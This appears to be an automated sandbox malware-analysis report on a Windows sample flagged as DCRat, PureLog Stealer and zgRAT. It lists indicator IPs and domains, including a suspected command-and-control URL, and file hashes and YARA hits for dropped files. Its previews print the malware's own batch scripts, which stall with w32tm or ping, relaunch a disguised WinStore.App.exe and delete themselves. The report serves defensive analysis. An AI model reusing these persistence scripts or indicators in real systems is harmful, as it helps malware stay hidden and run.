HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.190.177.23, 52.168.117.173, 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target WinStore.App.exe, PID 1196 because it is empty
Execution Graph export aborted for target WinStore.App.exe, PID 1856 because it is empty
Execution Graph export aborted for target WinStore.App.exe, PID 2556 because it is empty
Execution Graph export aborted for target WinStore.App.exe, PID 3652 because it is empty
Execution Graph export aborted for target WinStore.App.exe, PID 3656 because it is empty
Execution Graph export aborted for target WinStore.App.exe, PID 3712 because it is empty
Execution Graph export aborted for target WinStore.App.exe, PID 5228 because it is empty
Execution Graph export aborted for target WinStore.App.exe, PID 5440 because it is empty
Execution Graph export aborted for target WinStore.App.exe, PID 5580 because it is empty
Execution Graph export aborted for target WinStore.App.exe, PID 7124 because it is empty
Execution Graph export aborted for target WinStore.App.exe, PID 828 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:22:10	API Interceptor	10x Sleep call for process: WinStore.App.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.38.84	gkcQYEdJSO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	749858cm.renyash.ru/javascriptrequestApiBasePrivate.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	ciwa.mp4.hta	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.94.92
	Google Authenticator You're trying to sign in from a new location.msg	Get hash	malicious	Unknown	Browse	162.159.128.61
	xd.arm7.elf	Get hash	malicious	Mirai	Browse	162.159.16.108
	INQUIRY.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.177.134
	https://webmail.buzja.com/?auth=byoungjo.yoo@hyundaimovex.com	Get hash	malicious	HTMLPhisher	Browse	172.67.167.59
	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.214.186
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.151.193
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.158.190
	SET_UP.exe	Get hash	malicious	LummaC	Browse	104.21.89.250
	F3ePjP272h.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.220.198

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\BJKEmTPo.log	F3ePjP272h.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	cbCjTbodwa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	vb8DOBZQ4X.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	6G8OR42xrB.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	XNPOazHpXF.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	3e88PGFfkf.exe	Get hash	malicious	DCRat	Browse
	9FwQYJSj4N.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	8k1e14tjcx.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	gkcQYEdJSO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer	Browse

Created / dropped Files

C:\Program Files (x86)\Windows Sidebar\Gadgets\0569fd69283a46

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	ASCII text, with very long lines (744), with no line terminators
Category:	dropped
Size (bytes):	744
Entropy (8bit):	5.893964949087434
Encrypted:	false
SSDEEP:	12:dqBWrpngV2otrWsP+fYI5UorNKfWCAyP5KFi7LC84XtZzX/d:dIWriV3t3P6j5/vyxIC4dZzX1
MD5:	4FF940A2FD5D8DFF622B6F5807099C6B
SHA1:	9033AD501EC8C98A9B7A20417EBE4F8A70646146
SHA-256:	8FEF3DC49A9CE239968EB71DB54533540EB939DA4CC59EC34A2019A0A0D3F8A3
SHA-512:	7696346ABEE27529A1E9DD5262D501A069547AE707820B35389B6749AE137DA5B3712AE093E8FBCA031C98BA9F108E65AE3E324B77889C3B2922180B00B74AB9
Malicious:	false
Preview:	SYR4jtDh1fBgw4Nf1p9tlFUZSZlQJlwRzdVs4SUSWbBEV92uNgXu5rINE1mKHwYQturTifkjUrXJEQETg0DmNCVHUIoCpKKjCuUkSiMr6yZOU8JxxTnQtwCrYj8a1i3KgxGT5dA7oWqZmHwV90PWg30QrnLtkv0X4Orh2z2TSpmXGmERwnbATgnn70lSRRX2fSfXaPdJ85E0RdJEi466UzEYlDjBNjBASt1yHq1gKRCYbxWerhuXVaiqOGwWqb6Y3DihlV71DZwDwq6xrFUqzop1LLkA4e0sVoeYOy2Wj2U5of3hK8okHPjPXrWZv67ijEsILij3M7G6TuMpSC050QkFEPAhbdln5vWjwuVmZuYJJn5neqHsFBsTenE6hCctWdAiYn3hqOfF1a5aTXCuV2h3DDFJqZEXSoxpmXO1xjC1gmbDrnnK9rXe6HeVht1RJIxMnQy6IL6v0pXblBcDw4XkQStf23UEsusXyOabzqByumoQtDtfQxfOuM5UgSDO12CF79mXkBOF3jzoocwzJyx4PdnmSG4gnw72jiTubW5PjaVLWRpEgOFCFHzdWAEeHrcGl7EFJCXx2iVzIbPBa0AYr4wbs0XbRaI27PjZMk4e0RKhwAU4vDEQqDYrKmWSo6fcZc131zy05ghZuPpsfcqOW1L402OjNmz4wrHUIbD5POVJg8647owMQRFiQ7C8lOnSrnnCIUkEZu8IfBX16TmiznneliDKYETAkCc2

C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1914880
Entropy (8bit):	7.537245081602837
Encrypted:	false
SSDEEP:	24576:Ns665jgyrw+2b5mhqAYimWuEHWLE0YEB9UMUBf1OXrsjAm9psqYLz2E2N:NGJ5YdB4WLvv9U3wX0AysqYL4
MD5:	67247063BFBF3EEDFDFD183E8235A5E8
SHA1:	B64EA61F13D24490DF89A9DCA8F42273A7F6C034
SHA-256:	1F95432AB7C23F582ACBB0E94D153813D030D74EA12ECEF3DF325EF5583A8015
SHA-512:	CC2B9C6A09103B6A4768FE8DF27DDD5569385CEC52B11835930D02DE42D6D5350D6FB0FCCF742B993D57CB4920E9B084C7DB295A3F95C76B6EC6805F13D8C3F0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8dg.................0..........^N... ...`....@.. ....................................@..................................N..K....`.. ............................................................................ ............... ..H............text...d.... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B................@N......H.......D..............0...?o...M.......................................0..........(.... ........8........E...........N.......8....(.... ....~....{z...9....& ....8....(.... ....~....{....9....& ....8....(.... ....8........0.......... ........8........E................y...P...8....~....(O... .... .... ....s....~....(S....... ....~....{b...9....& ....8....~....:O... ....~....{....9y...& ....8n......... ....~....{....:T...& ....8I...r...ps....z*....~....(W...~....([... ....?.

C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files (x86)\WindowsPowerShell\Modules\9e60a5f7a3bd80

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	ASCII text, with very long lines (938), with no line terminators
Category:	dropped
Size (bytes):	938
Entropy (8bit):	5.916180738240521
Encrypted:	false
SSDEEP:	24:zvasxMvQQS0XLTQf9bW9F0hYTpU4rO8Y8LdCbdXCJbiAq7i+:DsmGQFbHhKUqO8Y84Bz77
MD5:	075D296DF6984FDB4C12D689B382B7AC
SHA1:	274D98BD4BE64268252B76F4D605CDC53686FF55
SHA-256:	08753EF1F84C3FD0C8AA09A2572E56CC51C0FF6ECC4AD3CCE6CFF1424BDE8989
SHA-512:	E5CD8BB7C702E03B21FDE857E63ABF5222312A93A409BE85461B21A9D11D1ED3905C4910943BD55725DE08E2CBBBD4BD464469D460D945CD1333D3DB7DEABB50
Malicious:	false
Preview:	zLPLVZhQe123FUC1uppSnRpfFtrQkdDak70b4bXPnFbhgTs3BjjmSfSiguFmsRqAybSHel6TRaohzH8wAxOA4aHFoS5KVugWZatFBkZamQV20vsYvTm5CqGYTMcLqw8h3SIZX3uZXyXnFPO3jgZBHlTsTVvyHNu0Sx9hnTA1jNhOScTE7jmJX6ZR9ZFCI5RKEgVRQrQQfhc4EFa1Cq0ilkdVYriNN8sn5XJwGByQTVnzefM49OAbEtieDA2iJCChyz8r5nuA2kOP6o12enO97RiMypsGJPHRSGAphf9VdAjeeShYJ9DfxCkhQv2Q5o1md760nLV9o3g7rDsfHT6JMldQgcYvnsazJ6BgWrv7oE14gm0MCXIlrsa1eqUKxkW5cqyvCMJai9eHujt3mLsPkzIbfJCpWkKDs5bzyFK0NrCsNTH47ail1GVniXP3JeD8zbZyI3EhB2C2wZNMBHs6BiMlkxRbzQqtnD3w3TwDWAk8Ec0IJC1BvH6QOxNUmmruLSOtgbTsVpjB7NhI6ISwZo7gHmhFFbatSzxvNHlrtIqGh5TAQFYeU5VhUsl44Nn4O0sHav4zglDR818LTgz9C6ZXePbffrxgev2rNLkeLj7t1DidualXYo1RaUmKUYTzxhwM9Q8H6Vxd9qgaq8vFFZI03kR3iZJwPH5URWddbdbC0XSuyMeWnNuXZ5TY9FjgLBO1vLJUeRol8FAgShFW5xJCXh5WCFeW440yJa8mCJ2VjIZT4xGbANlY1MeNQwRZxRrDOLW1icTw4ycPHlbP8CWrTc776vVQ1diRaWFsaP3h3zeDtPGpVBau5AtwOZ5xGD4bPKyvfsztJyxe83Nroq4zCxWamTeATGa04CxiaUJmMrkGMPxULOIZIEZbyXIMOyZDX6j5GoQUhSnUNPOXfKzF7BsznVuDM7YXShsPp2

C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1914880
Entropy (8bit):	7.537245081602837
Encrypted:	false
SSDEEP:	24576:Ns665jgyrw+2b5mhqAYimWuEHWLE0YEB9UMUBf1OXrsjAm9psqYLz2E2N:NGJ5YdB4WLvv9U3wX0AysqYL4
MD5:	67247063BFBF3EEDFDFD183E8235A5E8
SHA1:	B64EA61F13D24490DF89A9DCA8F42273A7F6C034
SHA-256:	1F95432AB7C23F582ACBB0E94D153813D030D74EA12ECEF3DF325EF5583A8015
SHA-512:	CC2B9C6A09103B6A4768FE8DF27DDD5569385CEC52B11835930D02DE42D6D5350D6FB0FCCF742B993D57CB4920E9B084C7DB295A3F95C76B6EC6805F13D8C3F0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8dg.................0..........^N... ...`....@.. ....................................@..................................N..K....`.. ............................................................................ ............... ..H............text...d.... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B................@N......H.......D..............0...?o...M.......................................0..........(.... ........8........E...........N.......8....(.... ....~....{z...9....& ....8....(.... ....~....{....9....& ....8....(.... ....8........0.......... ........8........E................y...P...8....~....(O... .... .... ....s....~....(S....... ....~....{b...9....& ....8....~....:O... ....~....{....9y...& ....8n......... ....~....{....:T...& ....8I...r...ps....z*....~....(W...~....([... ....?.

C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Default\0569fd69283a46

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	ASCII text, with very long lines (666), with no line terminators
Category:	dropped
Size (bytes):	666
Entropy (8bit):	5.890413826331233
Encrypted:	false
SSDEEP:	12:A3Arlcb/MdFSOEQNvgEoCYPx3A09nsbxZIfTzcvZgwR6QDCUUDWR/E:A3AKmSMYBCwxAuffyRDTLR/E
MD5:	2D99736A73353AE624E8D049A70BFEB9
SHA1:	258D4A6130CD87FCDEDD03AA334B869B70004555
SHA-256:	E1EE88ED3F45D19298D272E41DD9AFBB49345C5126828E5DCA195AA9FD2E397B
SHA-512:	4DEB3CE7104DC96BC59F42DCB66FF77E8CFE0FBE9073D89FB43D5E41F80004E5812B78A55D19FF1F18F2A7C555A970C062590058F7BD96021A8C45B866D0E95B
Malicious:	false
Preview:	Vc05MiiKuYOMqveIni1z4dA9XU6T1MP9pC0dXcJKFihREXKSuCUOMnu2c0h1lOTiJOgn5BuLZquW6s5AJnjy2BwCR8Ah4Si0P9Iz0hXsSIzf2Y5u5hs7peqIbeW6AMRGH3G7jFKmQ0gtLRJ3CPmXjlLuTAXVKarF0sX9R8LzWFry866KVc4vk4ggsVoirybzIa2d3KlDEwAe3XwWENArg6f6L0R5UmIin1phDcQK11qx3CnUjReextTM45SD2ptbnb0BsOTl6z0pPrDIN6WDHnu4idnHKNSMHOJbMlmU73h73o6M2Jz6TpU9r6dOlMashohBhl6lTBFOGwA3gaOBXW2c4JuQHXtvczaPH5pRNNmRkG345krK7ZVLvEGX0qe6RTvQWvwlv6xJtl1yQ0UhpixDdOdCyRbhtq9QUmhKxGZAlLbKNRH9V6QtgsxIRtxefQZDlldnTKtjJwbSwTzgJbLxaQumzZ2ES5fUvYilyeqLMqktQeV73QUEFmnV11x4RpQNRHgYvNsovAltqAVVD5KCkbPJuNu6rv3hZWbJ76MqiqSFA4p0fb0WeOn01Wnhcw79GETTjMXHsed4IKI0i4aP5hCKslRkSoNwtS86kVQTEsnAvtrrNx9iVrEjBJl84wyEQrLzLMQNnHLM3BZ93kWfop

C:\Users\Default\hjAOLvfTLePJensZtANoSVrh.exe

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1914880
Entropy (8bit):	7.537245081602837
Encrypted:	false
SSDEEP:	24576:Ns665jgyrw+2b5mhqAYimWuEHWLE0YEB9UMUBf1OXrsjAm9psqYLz2E2N:NGJ5YdB4WLvv9U3wX0AysqYL4
MD5:	67247063BFBF3EEDFDFD183E8235A5E8
SHA1:	B64EA61F13D24490DF89A9DCA8F42273A7F6C034
SHA-256:	1F95432AB7C23F582ACBB0E94D153813D030D74EA12ECEF3DF325EF5583A8015
SHA-512:	CC2B9C6A09103B6A4768FE8DF27DDD5569385CEC52B11835930D02DE42D6D5350D6FB0FCCF742B993D57CB4920E9B084C7DB295A3F95C76B6EC6805F13D8C3F0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8dg.................0..........^N... ...`....@.. ....................................@..................................N..K....`.. ............................................................................ ............... ..H............text...d.... ...0.................. ..`.rsrc... ....`.......2..............@....reloc...............6..............@..B................@N......H.......D..............0...?o...M.......................................0..........(.... ........8........E...........N.......8....(.... ....~....{z...9....& ....8....(.... ....~....{....9....& ....8....(.... ....8........0.......... ........8........E................y...P...8....~....(O... .... .... ....s....~....(S....... ....~....{b...9....& ....8....~....:O... ....~....{....9y...& ....8n......... ....~....{....:T...& ....8I...r...ps....z*....~....(W...~....([... ....?.

C:\Users\Default\hjAOLvfTLePJensZtANoSVrh.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\67VB5TS184.exe.log

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1179
Entropy (8bit):	5.354252320228764
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHK2
MD5:	074445AD437DEED8A22F11A846280CE2
SHA1:	23025D83D7C33396A5F736FC6F9945976CFCD5D1
SHA-256:	B7FD27029E12BE3B5C2C4010CC9C9BCB77CFE44852CC6EF4C3CED70740BB1CFD
SHA-512:	440F8E77340A5C2F64BF97BC712193145F03AEDB86C0F5C849CA1AD0190E5621DDD7AE8104862383E31FFEC49CCF483CF2E4533C501B2606EE1D0FE66E865B6D
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WinStore.App.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	5.370675888495854
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktGqZ4vwmj0qD
MD5:	5ACBB013936118762389287938AE0885
SHA1:	12C6B0AA2B5238E3154F3B538124EE9DB0E496D6
SHA-256:	28E292538199310B7DA27C6C743EFD34E1F806D28611B6C9EF4212D132272DEF
SHA-512:	E803C699BE7FC25FF09D1DEE86412CE8F18834E22E20B7D036323B740891A64B2CE33D0E0BD075178F0B6F496BA9CFBF7EF1A0884FE5E470C8CCF6D824891C77
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Temp\0T9X0LKmT6.bat

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	219
Entropy (8bit):	5.1022608180714455
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1r6KB8LDZKOZG1923fy1z4H:HTg9uYDEN6KBUrwMH
MD5:	85E3CBA1A1B3B615D923D28F2CDD866D
SHA1:	5392E43183618F5B00C60F7C7FFA2AA162AA6681
SHA-256:	8B2E6BCCCA3212CB8889A65F1DBC5B009E8822FF711CFFA2F9DCBD114AA33061
SHA-512:	D5194843B08F901B03B5929444D24F0294C35A9E76F6D5D496FDDEC0ECCE4E58AC0DB9E94215099AA9E516F8252183B09D08B84CC040501A88FE9B78015B64E1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\PrintHood\WinStore.App.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\0T9X0LKmT6.bat"

C:\Users\user\AppData\Local\Temp\2ucUGghGnf.bat

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	171
Entropy (8bit):	5.074133646674532
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1UdM6KBstnLk0diyBktKcKZG1Ukh4E2J5xAISGLDG:hCRLuVFOOr+DE1r6KB8LDZKOZG1923fq
MD5:	DFED31603D323AB639C6D6F78E3BB6E6
SHA1:	731961253128E80D40AB4E69C4B22E4E417EFB3A
SHA-256:	AACB7636257D034F114E7CD80E1A80AC3FA8A7C36692B390F67A23D499717E16
SHA-512:	615A826F772767FF3687DEB1BA4A668ACEB5FAA0E806B1011B483BF5C7D226337CAE91A9BFB6D35B46F17AC1434BCC34236F1060035E26AC9A5DCBDEFFD85D92
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\PrintHood\WinStore.App.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\2ucUGghGnf.bat"

C:\Users\user\AppData\Local\Temp\9HLXL6k6fT

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.163856189774724
Encrypted:	false
SSDEEP:	3:686+7IXu4n:68me4n
MD5:	27B7B1BFDC6BBE15F37232129E70FEBE
SHA1:	AF86CBC73B332650EE3A274A371FECAD7DF36A11
SHA-256:	2CD89262FAB2581587A7D890B2593E984B8634AF89FBE87890679E183FECAEB4
SHA-512:	2139B9B2B756B77EDFC017420B04B6CC79C5DDB1D1D55DCF146CFEB18E1BD94C0681A40EE2FBF6E50AF72662F48354A9279A8E7DD901B036F0C32AAFE1A9A6E7
Malicious:	false
Preview:	ezFkUeoTdMOr4x41oEmWa1RFa

C:\Users\user\AppData\Local\Temp\EtVpSBU0kW.bat

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	219
Entropy (8bit):	5.097393785144307
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1r6KB8LDZKOZG1923fZn:HTg9uYDEN6KBUrB
MD5:	B3FD3ABD38694B35EB6DB2A696A8AAB8
SHA1:	D17F2094C0FFAC600A96E19863028A38255684C3
SHA-256:	8DCD34E246D63D669301B68A7F7AB30B8A53E07AB4AB18BAB2E65DE276F8822F
SHA-512:	4E57560D9CDE7CE096B0EE60E9685A426A3F142D6A148D63FDC59C08C9648FA982FDD38A80ECA8C648BEB8CA3843A5CCD9A3A30E48D9FD5321ECC85DA6C414C1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\PrintHood\WinStore.App.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\EtVpSBU0kW.bat"

C:\Users\user\AppData\Local\Temp\HY3kVmQ00V.bat

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	171
Entropy (8bit):	5.140180615289173
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m1UdM6KBstnLk0diyBktKcKZG1Ukh4E2J5xAIH5QHK:hCRLuVFOOr+DE1r6KB8LDZKOZG1923fX
MD5:	F352E150770576F4FC4BA6D7D256D5C4
SHA1:	FD9D394C91028EE68F96D300240A85BB368544B8
SHA-256:	4572145FC8D773E0B323A249B8CDA796C35201F968AE78C42AB468F17DD036DA
SHA-512:	0DEB61FB3A22A19F10F8434E80119FC30C556C3BAA2ABB20940327797F4CC34DE069DFD5C7641FF00FCF8C759FB3334AC4C60A19E998B825B71C4E8F3AAD9938
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
